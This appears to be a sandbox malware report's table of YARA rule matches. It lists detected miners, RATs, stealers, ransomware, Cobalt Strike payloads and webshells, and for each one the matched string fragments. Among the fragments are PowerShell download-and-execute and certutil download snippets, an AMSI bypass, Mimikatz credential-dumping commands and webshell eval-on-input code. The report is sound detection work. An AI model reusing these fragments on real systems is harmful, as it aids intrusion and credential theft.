00000023.00000003.6299135359.0000028BD5FE4000.00000004.00000001.sdmp	JoeSecurity_Coinhive	Yara detected Coinhive miner	Joe Security
00000023.00000003.6338116203.0000028BD7305000.00000004.00000001.sdmp	JoeSecurity_Coinhive	Yara detected Coinhive miner	Joe Security
00000023.00000003.6264910076.0000028BD7D54000.00000004.00000001.sdmp	CredTheft_MSIL_ADPassHunt_2	unknown	FireEye	0x15656:$pdb1: \ADPassHunt\ 0x15667:$pdb2: \ADPassHunt.pdb 0x1567b:$s1: Usage: .\ADPassHunt.exe 0x15697:$s2: [ADA] Searching for accounts with msSFU30Password attribute 0x156d7:$s3: [ADA] Searching for accounts with userpassword attribute 0x15714:$s4: [GPP] Searching for passwords now
00000023.00000003.6264910076.0000028BD7D54000.00000004.00000001.sdmp	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
00000023.00000003.6283884268.0000028BD64D2000.00000004.00000001.sdmp	JoeSecurity_Coinhive	Yara detected Coinhive miner	Joe Security
00000023.00000003.6276483685.0000028BD76A0000.00000004.00000001.sdmp	Cobaltbaltstrike_Payload_Encoded	Detects CobaltStrike payloads	Avast Threat Intel Team	0xc1aa:$s05: fce8890000006089e531d2648b52308b
00000023.00000003.6276483685.0000028BD76A0000.00000004.00000001.sdmp	webshell_php_obfuscated_encoding	PHP webshell obfuscated by encoding	Arnim Rupp	0x21dc8:$enc_eval1: \x65\x76\x61\x6c\x28 0x21dc8:$enc_eval2: \x65\x76\x61\x6c\x28 0x156b6:$php_short: <? 0x20a3e:$php_short: <? 0x20ac9:$php_short: <? 0x20b54:$php_short: <? 0x23f2e:$php_short: <? 0x2cda1:$php_short: <? 0x302ca:$php_short: <? 0x312ff:$php_short: <? 0x32aa7:$php_short: <? 0x3e263:$php_short: <? 0x32aa7:$php_new2: <?php
00000023.00000003.6276483685.0000028BD76A0000.00000004.00000001.sdmp	webshell_php_dynamic_big	PHP webshell using $a($code) for kind of eval with encoded blob to decode, e.g. b374k	Arnim Rupp	0x32aa7:$new_php2: <?php 0x323b2:$dynamic3: $_server[base64_decode(' 0x20e9c:$gen_bit_sus11: "cmd.exe 0x20f28:$gen_bit_sus11: "cmd.exe 0x2103f:$gen_bit_sus11: "cmd.exe 0x23e1b:$gen_bit_sus11: "cmd.exe 0xecf5:$gen_bit_sus47: Shell 0x369f3:$gen_bit_sus47: Shell 0x528d:$gen_bit_sus50: bypass 0x3220e:$gen_bit_sus50: bypass 0x32448:$gen_bit_sus59: 'cmd' 0xdaa3:$gen_bit_sus60: "execute" 0xdada:$gen_bit_sus60: "execute" 0xc0ac:$gen_bit_sus62: Cyber 0xc14c:$gen_bit_sus62: Cyber 0x30c3a:$gen_bit_sus69: $cmd 0x2220e:$gen_much_sus8: Webshell 0x25860:$gen_much_sus8: Webshell 0x31279:$gen_much_sus8: WebShell 0x31515:$gen_much_sus8: Webshell 0x323f9:$gen_much_sus8: Webshell
00000023.00000003.6276483685.0000028BD76A0000.00000004.00000001.sdmp	webshell_php_by_string_obfuscation	PHP file containing obfuscation strings. Might be legitimate code obfuscated for whatever reasons, a webshell or can be used to insert malicious Javascript for credit card skimming	Arnim Rupp	0x21dc8:$opbs77: \x65\x76\x61\x6c\x28 0x156b6:$php_short: <? 0x20a3e:$php_short: <? 0x20ac9:$php_short: <? 0x20b54:$php_short: <? 0x23f2e:$php_short: <? 0x2cda1:$php_short: <? 0x302ca:$php_short: <? 0x312ff:$php_short: <? 0x32aa7:$php_short: <? 0x3e263:$php_short: <? 0x32aa7:$php_new2: <?php
00000023.00000003.6320629595.0000028BD71FC000.00000004.00000001.sdmp	JoeSecurity_Coinhive	Yara detected Coinhive miner	Joe Security
00000023.00000003.6320629595.0000028BD71FC000.00000004.00000001.sdmp	xtremrat	Xtrem RAT v3.5	Jean-Philippe Teissier / @Jipe_	0x3ffd2:$a: XTREME 0x3ffe4:$a: XTREME 0x3ffe4:$b: XTREMEBINDER
00000023.00000003.6277372616.0000028BD786E000.00000004.00000001.sdmp	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
00000023.00000003.6273486144.0000028BD7B45000.00000004.00000001.sdmp	TA17_293A_malware_1	inveigh pen testing tools & related artifacts	US-CERT Code Analysis Team (modified by Florian Roth)	0x3aa7:$n1: file:// 0x255cd:$n1: file:// 0x3f3f:$ax2: 5.153.58.45
00000023.00000003.6273486144.0000028BD7B45000.00000004.00000001.sdmp	CoinMiner_Strings	Detects mining pool protocol string in Executable	Florian Roth	0x15c42:$s1: stratum+tcp://
00000023.00000003.6399025086.0000028BD6EA1000.00000004.00000001.sdmp	webshell_php_gzinflated	PHP webshell which directly eval()s obfuscated string	Arnim Rupp	0x2a9b9:$payload4: eval(gzuncompress(base64_decode 0x4033:$php_short: <? 0xf9fa:$php_short: <? 0xfa63:$php_short: <? 0xfacc:$php_short: <? 0xfb35:$php_short: <? 0xfb9e:$php_short: <? 0x3cda9:$php_short: <? 0x40b28:$php_short: <? 0xf9fa:$php_new2: <?php 0xfa63:$php_new2: <?php 0xfacc:$php_new2: <?php 0xfb35:$php_new2: <?php 0xfb9e:$php_new2: <?php
00000023.00000003.6399025086.0000028BD6EA1000.00000004.00000001.sdmp	SUSP_Base64_Encoded_Hex_Encoded_Code	Detects hex encoded code that has been base64 encoded	Florian Roth	0x23e97:$x1: 78 34 4E 7A 68 63 65 44 4D 32 58 48 67 0x23ea7:$x1: 78 34 4E 57 4E 63 65 44 63 34 58 48 67 0x245bd:$x1: 78 34 4E 57 4E 63 65 44 63 34 58 48 67 0x245ed:$x1: 78 34 4E 7A 68 63 65 44 4D 33 58 48 67 0x245fd:$x1: 78 34 4E 57 4E 63 65 44 63 34 58 48 67 0x24b67:$x1: 78 34 4E 7A 68 63 65 44 4D 33 58 48 67 0x24b77:$x1: 78 34 4E 57 4E 63 65 44 63 34 58 48 67
00000023.00000003.6399025086.0000028BD6EA1000.00000004.00000001.sdmp	JoeSecurity_Coinhive	Yara detected Coinhive miner	Joe Security
00000023.00000003.6311413449.0000028BD79B9000.00000004.00000001.sdmp	webshell_asp_generic_eval_on_input	Generic ASP webshell which uses any eval/exec function directly on user input	Arnim Rupp	0xa49d:$payload_and_input1: eval(request. 0xa480:$tagasp_short1: <%@ 0xa49b:$tagasp_short1: <%e 0xa499:$tagasp_short2: %> 0xa4bf:$tagasp_short2: %> 0xa49b:$tagasp_long13: <%ev 0xa480:$tagasp_long20: <%@pagelanguage="jscript 0x81a4:$jsp4: public
00000023.00000003.6311413449.0000028BD79B9000.00000004.00000001.sdmp	webshell_asp_generic	Generic ASP webshell which uses any eval/exec function indirectly on user input or writes a file	Arnim Rupp	0x7bbb:$asp_much_sus8: Webshell 0x7e95:$asp_much_sus8: Webshell 0x9c72:$asp_much_sus8: webshell 0xa4b5:$asp_much_sus18: "unsafe 0x9ee4:$asp_gen_sus11: "cmd.exe 0x9a5f:$asp_gen_obf1: "+" 0x9a6c:$asp_gen_obf1: "+" 0x9a70:$asp_gen_obf1: "+" 0xa480:$tagasp_short1: <%@ 0xa49b:$tagasp_short1: <%e 0xa499:$tagasp_short2: %> 0xa4bf:$tagasp_short2: %> 0xa49b:$tagasp_long13: <%ev 0xa480:$tagasp_long20: <%@pagelanguage="jscript 0x81a4:$jsp4: public 0xa4a2:$asp_input1: request 0x13e0b:$asp_text1: .text 0x7bfd:$asp_payload2: eval( 0xa49d:$asp_payload2: eval( 0xa831:$asp_payload2: eval( 0x3294:$asp_payload4: :eval
00000023.00000003.6284624022.0000028BD68F5000.00000004.00000001.sdmp	clearlog	Detects Fireball malware - file clearlog.dll	Florian Roth	0x20867:$s3: hhhhh.exe 0x20851:$s4: ttttt.exe 0x2083b:$s6: cle.log.1
00000023.00000003.6430913129.0000028BD7E73000.00000004.00000001.sdmp	SUSP_PowerShell_Caret_Obfuscation_2	Detects powershell keyword obfuscated with carets	Florian Roth	0x28541:$r1: p^o^w^e^r^s^h^E^L^L 0x28541:$r2: p^o^w^e^r^s^h^E^L^L
00000023.00000003.6430913129.0000028BD7E73000.00000004.00000001.sdmp	CoinMiner_Strings	Detects mining pool protocol string in Executable	Florian Roth	0x136c6:$s1: stratum+tcp:// 0x13761:$s1: stratum+tcp:// 0x138b8:$s1: stratum+tcp://
00000023.00000003.6430913129.0000028BD7E73000.00000004.00000001.sdmp	MAL_unspecified_Jan18_1	Detects unspecified malware sample	Florian Roth	0x132cd:$s3: [Log Started] - [%.2d/%.2d/%d %.2d:%.2d:%.2d] 0x132a3:$s4: start /b "" cmd /c del "%%~f0"&exit /b 0x2d0b5:$s5: [%s] - [%.2d/%.2d/%d %.2d:%.2d:%.2d] 0x132fe:$s6: %s\%s.bat
00000023.00000003.6430913129.0000028BD7E73000.00000004.00000001.sdmp	JoeSecurity_Vidar	Yara detected Vidar stealer	Joe Security
00000023.00000003.6430913129.0000028BD7E73000.00000004.00000001.sdmp	JoeSecurity_ByteLocker	Yara detected ByteLocker Ransomware	Joe Security
00000023.00000003.6430913129.0000028BD7E73000.00000004.00000001.sdmp	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
00000023.00000003.6430913129.0000028BD7E73000.00000004.00000001.sdmp	JoeSecurity_Cryptolocker	Yara detected Cryptolocker ransomware	Joe Security
00000023.00000003.6430913129.0000028BD7E73000.00000004.00000001.sdmp	JoeSecurity_Artemon	Yara detected Artemon Ransomware	Joe Security
00000023.00000003.6430913129.0000028BD7E73000.00000004.00000001.sdmp	JoeSecurity_lazparking	Yara detected LazParking Ransomware	Joe Security
00000023.00000003.6349322522.0000028BD67F0000.00000004.00000001.sdmp	JoeSecurity_Coinhive	Yara detected Coinhive miner	Joe Security
00000023.00000003.6316150838.0000028BD6D56000.00000004.00000001.sdmp	CoinMiner_Strings	Detects mining pool protocol string in Executable	Florian Roth	0x1b8d6:$s1: stratum+tcp://
00000023.00000003.6316150838.0000028BD6D56000.00000004.00000001.sdmp	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
00000023.00000003.6436106917.0000028BD69FC000.00000004.00000001.sdmp	JoeSecurity_LimeRAT	Yara detected LimeRAT	Joe Security
00000023.00000003.6348949380.0000028BD7D54000.00000004.00000001.sdmp	CredTheft_MSIL_ADPassHunt_2	unknown	FireEye	0x15656:$pdb1: \ADPassHunt\ 0x15667:$pdb2: \ADPassHunt.pdb 0x1567b:$s1: Usage: .\ADPassHunt.exe 0x15697:$s2: [ADA] Searching for accounts with msSFU30Password attribute 0x156d7:$s3: [ADA] Searching for accounts with userpassword attribute 0x15714:$s4: [GPP] Searching for passwords now
00000023.00000003.6348949380.0000028BD7D54000.00000004.00000001.sdmp	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
00000023.00000003.6306591281.0000028BD7440000.00000004.00000001.sdmp	JoeSecurity_Coinhive	Yara detected Coinhive miner	Joe Security
00000023.00000003.6340321135.0000028BD67F0000.00000004.00000001.sdmp	JoeSecurity_Coinhive	Yara detected Coinhive miner	Joe Security
00000023.00000003.6346082988.0000028BD6579000.00000004.00000001.sdmp	JoeSecurity_Coinhive	Yara detected Coinhive miner	Joe Security
00000023.00000003.6280069144.0000028BD7AC1000.00000004.00000001.sdmp	Mimikatz_Memory_Rule_1	Detects password dumper mimikatz in memory (False Positives: an service that could have copied a Mimikatz executable, AV signatures)	Florian Roth	0x170:$s2: sekurlsa::wdigest 0xa1:$s6: sekurlsa::livessp 0xe6:$s9: sekurlsa::process 0x12b:$s12: sekurlsa::tickets 0x5c:$s15: sekurlsa::credman
00000023.00000003.6322660545.0000028BD67AB000.00000004.00000001.sdmp	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
00000023.00000003.6322660545.0000028BD67AB000.00000004.00000001.sdmp	JoeSecurity_Coinhive	Yara detected Coinhive miner	Joe Security
00000023.00000003.6439110180.0000028BD7F7A000.00000004.00000001.sdmp	Base64_PS1_Shellcode	Detects Base64 encoded PS1 Shellcode	Nick Carr, David Ledbetter	0xa4df:$substring: AAAAYInlM 0xa4db:$pattern1: /OiCAAAAYInlM
00000023.00000003.6439110180.0000028BD7F7A000.00000004.00000001.sdmp	WScript_Shell_PowerShell_Combo	Detects malware from Middle Eastern campaign reported by Talos	Florian Roth	0x13b7e:$s1: .CreateObject("WScript.Shell") 0x1d1b4:$s1: .CreateObject("WScript.Shell") 0x1010d:$p1: powershell.exe 0x10163:$p1: powershell.exe 0x3dfc8:$p1: powershell.exe 0x10130:$p2: -ExecutionPolicy Bypass 0x10186:$p2: -ExecutionPolicy Bypass 0xa4b7:$p3: [System.Convert]::FromBase64String(
00000023.00000003.6439110180.0000028BD7F7A000.00000004.00000001.sdmp	JoeSecurity_MetasploitPayload_3	Yara detected Metasploit Payload	Joe Security
00000023.00000003.6344420092.0000028BD7070000.00000004.00000001.sdmp	CoinMiner_Strings	Detects mining pool protocol string in Executable	Florian Roth	0x2f7c3:$s1: stratum+tcp://
00000023.00000003.6344420092.0000028BD7070000.00000004.00000001.sdmp	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
00000023.00000003.6332134086.0000028BD7440000.00000004.00000001.sdmp	JoeSecurity_Coinhive	Yara detected Coinhive miner	Joe Security
0000000A.00000002.7244913734.000000001E201000.00000004.00000001.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
0000000A.00000002.7244913734.000000001E201000.00000004.00000001.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000023.00000003.6264075284.0000028BD8107000.00000004.00000001.sdmp	CoinMiner_Strings	Detects mining pool protocol string in Executable	Florian Roth	0x266cb:$s1: stratum+tcp://
00000023.00000003.6264075284.0000028BD8107000.00000004.00000001.sdmp	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
00000023.00000003.6264075284.0000028BD8107000.00000004.00000001.sdmp	JoeSecurity_Coinhive	Yara detected Coinhive miner	Joe Security
00000023.00000003.6276951583.0000028BD782D000.00000004.00000001.sdmp	JoeSecurity_Njrat	Yara detected Njrat	Joe Security
00000023.00000003.6423998600.0000028BD6EA1000.00000004.00000001.sdmp	webshell_php_gzinflated	PHP webshell which directly eval()s obfuscated string	Arnim Rupp	0x2a9b9:$payload4: eval(gzuncompress(base64_decode 0x4033:$php_short: <? 0xf9fa:$php_short: <? 0xfa63:$php_short: <? 0xfacc:$php_short: <? 0xfb35:$php_short: <? 0xfb9e:$php_short: <? 0x3cda9:$php_short: <? 0x40b28:$php_short: <? 0xf9fa:$php_new2: <?php 0xfa63:$php_new2: <?php 0xfacc:$php_new2: <?php 0xfb35:$php_new2: <?php 0xfb9e:$php_new2: <?php
00000023.00000003.6423998600.0000028BD6EA1000.00000004.00000001.sdmp	SUSP_Base64_Encoded_Hex_Encoded_Code	Detects hex encoded code that has been base64 encoded	Florian Roth	0x23e97:$x1: 78 34 4E 7A 68 63 65 44 4D 32 58 48 67 0x23ea7:$x1: 78 34 4E 57 4E 63 65 44 63 34 58 48 67 0x245bd:$x1: 78 34 4E 57 4E 63 65 44 63 34 58 48 67 0x245ed:$x1: 78 34 4E 7A 68 63 65 44 4D 33 58 48 67 0x245fd:$x1: 78 34 4E 57 4E 63 65 44 63 34 58 48 67 0x24b67:$x1: 78 34 4E 7A 68 63 65 44 4D 33 58 48 67 0x24b77:$x1: 78 34 4E 57 4E 63 65 44 63 34 58 48 67
00000023.00000003.6423998600.0000028BD6EA1000.00000004.00000001.sdmp	JoeSecurity_Coinhive	Yara detected Coinhive miner	Joe Security
00000023.00000003.6295888912.0000028BD60A3000.00000004.00000001.sdmp	Mimikatz_Memory_Rule_1	Detects password dumper mimikatz in memory (False Positives: an service that could have copied a Mimikatz executable, AV signatures)	Florian Roth	0x284cd:$s4: sekurlsa::kerberos
00000023.00000003.6295229489.0000028BD65FD000.00000004.00000001.sdmp	APT_DeputyDog_Fexel	unknown	ThreatConnect Intelligence Research Team	0xc749:$cUp: Upload failed! [Remote error code: 0xc829:$GDGSYDLYR: GDGSYDLYR_%
00000023.00000003.6282378484.0000028BD702F000.00000004.00000001.sdmp	Mimikatz_Memory_Rule_1	Detects password dumper mimikatz in memory (False Positives: an service that could have copied a Mimikatz executable, AV signatures)	Florian Roth	0x31268:$s1: sekurlsa::msv 0x312ea:$s7: sekurlsa::ssp 0x312a9:$s11: sekurlsa::pth
00000023.00000003.6299891132.0000028BD7070000.00000004.00000001.sdmp	CoinMiner_Strings	Detects mining pool protocol string in Executable	Florian Roth	0x2f7c3:$s1: stratum+tcp://
00000023.00000003.6299891132.0000028BD7070000.00000004.00000001.sdmp	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
00000023.00000003.6398582086.0000028BD6E91000.00000004.00000001.sdmp	webshell_php_gzinflated	PHP webshell which directly eval()s obfuscated string	Arnim Rupp	0x3a9b9:$payload4: eval(gzuncompress(base64_decode 0x2a84:$php_short: <? 0x7ac6:$php_short: <? 0x7e13:$php_short: <? 0x14033:$php_short: <? 0x1f9fa:$php_short: <? 0x1fa63:$php_short: <? 0x1facc:$php_short: <? 0x1fb35:$php_short: <? 0x1fb9e:$php_short: <? 0x4cda9:$php_short: <? 0x50b28:$php_short: <? 0x1f9fa:$php_new2: <?php 0x1fa63:$php_new2: <?php 0x1facc:$php_new2: <?php 0x1fb35:$php_new2: <?php 0x1fb9e:$php_new2: <?php
00000023.00000003.6398582086.0000028BD6E91000.00000004.00000001.sdmp	SUSP_Base64_Encoded_Hex_Encoded_Code	Detects hex encoded code that has been base64 encoded	Florian Roth	0x33e97:$x1: 78 34 4E 7A 68 63 65 44 4D 32 58 48 67 0x33ea7:$x1: 78 34 4E 57 4E 63 65 44 63 34 58 48 67 0x345bd:$x1: 78 34 4E 57 4E 63 65 44 63 34 58 48 67 0x345ed:$x1: 78 34 4E 7A 68 63 65 44 4D 33 58 48 67 0x345fd:$x1: 78 34 4E 57 4E 63 65 44 63 34 58 48 67 0x34b67:$x1: 78 34 4E 7A 68 63 65 44 4D 33 58 48 67 0x34b77:$x1: 78 34 4E 57 4E 63 65 44 63 34 58 48 67
00000023.00000003.6398582086.0000028BD6E91000.00000004.00000001.sdmp	JoeSecurity_Coinhive	Yara detected Coinhive miner	Joe Security
00000023.00000003.6266904104.0000028BD642E000.00000004.00000001.sdmp	JoeSecurity_Coinhive	Yara detected Coinhive miner	Joe Security
00000023.00000003.6435757961.0000028BD7C8D000.00000004.00000001.sdmp	webshell_php_generic	php webshell having some kind of input and some kind of payload. restricted to small files or big ones inclusing suspicious strings	Arnim Rupp	0xaec6:$php_short: <? 0xaf05:$php_short: <? 0xaf45:$php_short: <? 0xaf88:$php_short: <? 0xafd2:$php_short: <? 0xb2ef:$php_short: <? 0xb3dd:$php_short: <? 0xb4ca:$php_short: <? 0xb523:$php_short: <? 0xb6a1:$php_short: <? 0xaec6:$php_new2: <?php 0xaf05:$php_new2: <?php 0xaf45:$php_new2: <?php 0xaf88:$php_new2: <?php 0xafd2:$php_new2: <?php 0xb2ef:$php_new2: <?php 0xb4ca:$php_new2: <?php 0xb523:$php_new2: <?php 0xb6a1:$php_new2: <?php 0xba5e:$inp4: _POST[ 0xaee9:$cpayload1: eval($
00000023.00000003.6435757961.0000028BD7C8D000.00000004.00000001.sdmp	webshell_asp_generic_eval_on_input	Generic ASP webshell which uses any eval/exec function directly on user input	Arnim Rupp	0xb8ab:$payload_and_input1: eval(request. 0xae60:$tagasp_short1: <%e 0xae76:$tagasp_short1: <%\x90 0xb443:$tagasp_short1: <%e 0xb57e:$tagasp_short1: <%e 0xb88c:$tagasp_short1: <%@ 0xb8a9:$tagasp_short1: <%e 0xae35:$tagasp_short2: %> 0xae5e:$tagasp_short2: %> 0xae70:$tagasp_short2: %> 0xb592:$tagasp_short2: %> 0xb8a7:$tagasp_short2: %> 0x1a43a:$tagasp_short2: %> 0x24a66:$tagasp_short2: %> 0xae60:$tagasp_long13: <%ev 0xb443:$tagasp_long13: <%ev 0xb57e:$tagasp_long13: <%ev 0xb8a9:$tagasp_long13: <%ev
00000023.00000003.6435757961.0000028BD7C8D000.00000004.00000001.sdmp	PowerShell_Susp_Parameter_Combo	Detects PowerShell invocation with suspicious parameters	Florian Roth	0x12da4:$sb3: -Windowstyle hidden 0x2d537:$sb3: -WindowStyle Hidden 0x12d97:$se2: -exec bypass 0x2d54b:$se3: -ExecutionPolicy Bypass 0x12d97:$se4: -exec bypass
00000023.00000003.6435757961.0000028BD7C8D000.00000004.00000001.sdmp	Oilrig_IntelSecurityManager_macro	Detects OilRig malware	Eyal Sela (slightly modified by Florian Roth)	0x125ab:$one6: Shell Environ$("COMSPEC") & " /c 0x12672:$one6: Shell Environ$("COMSPEC") & " /c 0x12bf5:$one6: Shell Environ$("COMSPEC") & " /c 0x12c16:$one7: echo " & Chr(32) & cmd & Chr(32) & " > " & Chr(34) 0x12ba8:$two5: NullRefrencedException 0x12bc0:$two6: error has occurred in user32.dll by 0x12ba8:$two7: NullRefrencedException
00000023.00000003.6435757961.0000028BD7C8D000.00000004.00000001.sdmp	JoeSecurity_Cobra_Locker	Yara detected Cobra Locker ransomware	Joe Security
00000023.00000003.6333202344.0000028BD76A0000.00000004.00000001.sdmp	Cobaltbaltstrike_Payload_Encoded	Detects CobaltStrike payloads	Avast Threat Intel Team	0xc1aa:$s05: fce8890000006089e531d2648b52308b
00000023.00000003.6333202344.0000028BD76A0000.00000004.00000001.sdmp	webshell_php_obfuscated_encoding	PHP webshell obfuscated by encoding	Arnim Rupp	0x21dc8:$enc_eval1: \x65\x76\x61\x6c\x28 0x21dc8:$enc_eval2: \x65\x76\x61\x6c\x28 0x156b6:$php_short: <? 0x20a3e:$php_short: <? 0x20ac9:$php_short: <? 0x20b54:$php_short: <? 0x23f2e:$php_short: <? 0x2cda1:$php_short: <? 0x302ca:$php_short: <? 0x312ff:$php_short: <? 0x32aa7:$php_short: <? 0x3e263:$php_short: <? 0x32aa7:$php_new2: <?php
00000023.00000003.6333202344.0000028BD76A0000.00000004.00000001.sdmp	webshell_php_dynamic_big	PHP webshell using $a($code) for kind of eval with encoded blob to decode, e.g. b374k	Arnim Rupp	0x32aa7:$new_php2: <?php 0x323b2:$dynamic3: $_server[base64_decode(' 0x20e9c:$gen_bit_sus11: "cmd.exe 0x20f28:$gen_bit_sus11: "cmd.exe 0x2103f:$gen_bit_sus11: "cmd.exe 0x23e1b:$gen_bit_sus11: "cmd.exe 0xecf5:$gen_bit_sus47: Shell 0x369f3:$gen_bit_sus47: Shell 0x528d:$gen_bit_sus50: bypass 0x3220e:$gen_bit_sus50: bypass 0x32448:$gen_bit_sus59: 'cmd' 0xdaa3:$gen_bit_sus60: "execute" 0xdada:$gen_bit_sus60: "execute" 0xc0ac:$gen_bit_sus62: Cyber 0xc14c:$gen_bit_sus62: Cyber 0x30c3a:$gen_bit_sus69: $cmd 0x2220e:$gen_much_sus8: Webshell 0x25860:$gen_much_sus8: Webshell 0x31279:$gen_much_sus8: WebShell 0x31515:$gen_much_sus8: Webshell 0x323f9:$gen_much_sus8: Webshell
00000023.00000003.6333202344.0000028BD76A0000.00000004.00000001.sdmp	webshell_php_by_string_obfuscation	PHP file containing obfuscation strings. Might be legitimate code obfuscated for whatever reasons, a webshell or can be used to insert malicious Javascript for credit card skimming	Arnim Rupp	0x21dc8:$opbs77: \x65\x76\x61\x6c\x28 0x156b6:$php_short: <? 0x20a3e:$php_short: <? 0x20ac9:$php_short: <? 0x20b54:$php_short: <? 0x23f2e:$php_short: <? 0x2cda1:$php_short: <? 0x302ca:$php_short: <? 0x312ff:$php_short: <? 0x32aa7:$php_short: <? 0x3e263:$php_short: <? 0x32aa7:$php_new2: <?php
00000023.00000003.6336368207.0000028BD7C4C000.00000004.00000001.sdmp	JoeSecurity_Coinhive	Yara detected Coinhive miner	Joe Security
00000023.00000003.6332319497.0000028BD7A3C000.00000004.00000001.sdmp	webshell_php_by_string_obfuscation	PHP file containing obfuscation strings. Might be legitimate code obfuscated for whatever reasons, a webshell or can be used to insert malicious Javascript for credit card skimming	Arnim Rupp	0x4da1:$opbs73: eval(str_rot13( 0x32f4:$php_short: <? 0x767b:$php_short: <? 0x23557:$php_short: <? 0x23aa7:$php_short: <? 0x2a5b5:$php_short: <? 0x37c06:$php_short: <? 0x2a5b5:$php_new1: <?=$
00000023.00000003.6332319497.0000028BD7A3C000.00000004.00000001.sdmp	JoeSecurity_Coinhive	Yara detected Coinhive miner	Joe Security
00000023.00000003.6308819602.0000028BD71FC000.00000004.00000001.sdmp	JoeSecurity_Coinhive	Yara detected Coinhive miner	Joe Security
00000023.00000003.6308819602.0000028BD71FC000.00000004.00000001.sdmp	xtremrat	Xtrem RAT v3.5	Jean-Philippe Teissier / @Jipe_	0x3ffd2:$a: XTREME 0x3ffe4:$a: XTREME 0x3ffe4:$b: XTREMEBINDER
00000023.00000003.6292767693.0000028BD7F7B000.00000004.00000001.sdmp	SUSP_Base64_Encoded_Hex_Encoded_Code	Detects hex encoded code that has been base64 encoded	Florian Roth	0x37817:$x1: 78 34 4E 54 64 63 65 44 55 7A 58 48 67 0x37827:$x1: 78 34 4E 7A 4A 63 65 44 59 35 58 48 67
00000023.00000003.6292767693.0000028BD7F7B000.00000004.00000001.sdmp	JoeSecurity_Allatori_JAR_Obfuscator	Yara detected Allatori_JAR_Obfuscator	Joe Security
00000023.00000003.6292767693.0000028BD7F7B000.00000004.00000001.sdmp	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
00000023.00000003.6296840471.0000028BD7347000.00000004.00000001.sdmp	HackTool_Samples	Hacktool	unknown	0x3dbd2:$c: Failed to load SAM functions
00000023.00000003.6296840471.0000028BD7347000.00000004.00000001.sdmp	PS_AMSI_Bypass	Detects PowerShell AMSI Bypass	Florian Roth	0x8128:$s1: .getfield('amsicontext',[reflection.bindingflags]'nonpublic,static').
00000023.00000003.6296840471.0000028BD7347000.00000004.00000001.sdmp	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
00000023.00000003.6438080287.0000028BD7556000.00000004.00000001.sdmp	Certutil_Decode_OR_Download	Certutil Decode	Florian Roth	0xf0c5:$a5: certutil -urlcache -split -f http
00000023.00000003.6329904387.0000028BD62AA000.00000004.00000001.sdmp	JoeSecurity_Allatori_JAR_Obfuscator	Yara detected Allatori_JAR_Obfuscator	Joe Security
00000023.00000003.6320105225.0000028BD6890000.00000004.00000001.sdmp	RemCom_RemoteCommandExecution	Detects strings from RemCom tool	Florian Roth	0x18238:$: \\.\pipe\%s%s%d
00000023.00000003.6431685607.0000028BD6D56000.00000004.00000001.sdmp	SUSP_PowerShell_IEX_Download_Combo	Detects strings found in sample from CN group repo leak in October 2018	Florian Roth	0x38922:$x1: IEX ((new-object net.webclient).download
00000023.00000003.6431685607.0000028BD6D56000.00000004.00000001.sdmp	CoinMiner_Strings	Detects mining pool protocol string in Executable	Florian Roth	0x27aae:$s1: stratum+tcp://
00000023.00000003.6438769310.0000028BD7F39000.00000004.00000001.sdmp	CoinMiner_Strings	Detects mining pool protocol string in Executable	Florian Roth	0x1078e:$s1: stratum+tcp://
00000023.00000003.6438769310.0000028BD7F39000.00000004.00000001.sdmp	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
00000023.00000003.6272308582.0000028BD6A80000.00000004.00000001.sdmp	JoeSecurity_Coinhive	Yara detected Coinhive miner	Joe Security
00000023.00000003.6318934861.0000028BD62E5000.00000004.00000001.sdmp	webshell_jsp_by_string	JSP Webshells which contain unique strings, lousy rule for low hanging fruits. Most are catched by other rules in here but maybe these catch different versions.	Arnim Rupp	0x69f5:$jstring15: runtime.getruntime().exec(request.getparameter( 0x5844:$cjsp_short1: <% 0x585f:$cjsp_short1: <% 0x585d:$cjsp_short2: %> 0x5844:$cjsp_long4: <%@p
00000023.00000003.6324978129.0000028BD7280000.00000004.00000001.sdmp	webshell_php_by_string_obfuscation	PHP file containing obfuscation strings. Might be legitimate code obfuscated for whatever reasons, a webshell or can be used to insert malicious Javascript for credit card skimming	Arnim Rupp	0x4d2e:$opbs48: se'.(32*2) 0x576f:$php_short: <? 0x576f:$php_new2: <?php
00000023.00000003.6324978129.0000028BD7280000.00000004.00000001.sdmp	webshell_asp_obfuscated	ASP webshell obfuscated	Arnim Rupp	0x4831:$asp_obf2: u"+"n"+"s 0x4b6a:$tagasp_short1: <%e 0x4b81:$tagasp_short2: %> 0x4b6a:$tagasp_long12: <%ex 0x4172:$tagasp_long20: <scriptlanguage="vb 0x580c:$asp_payload2: eval( 0x4254:$asp_payload8: execute( 0x429e:$asp_payload8: execute( 0x4b1f:$asp_payload8: execute( 0x58a7:$asp_multi_payload_one3: .run 0x6709:$asp_multi_payload_one3: .run 0x7aaa:$asp_multi_payload_one3: .run
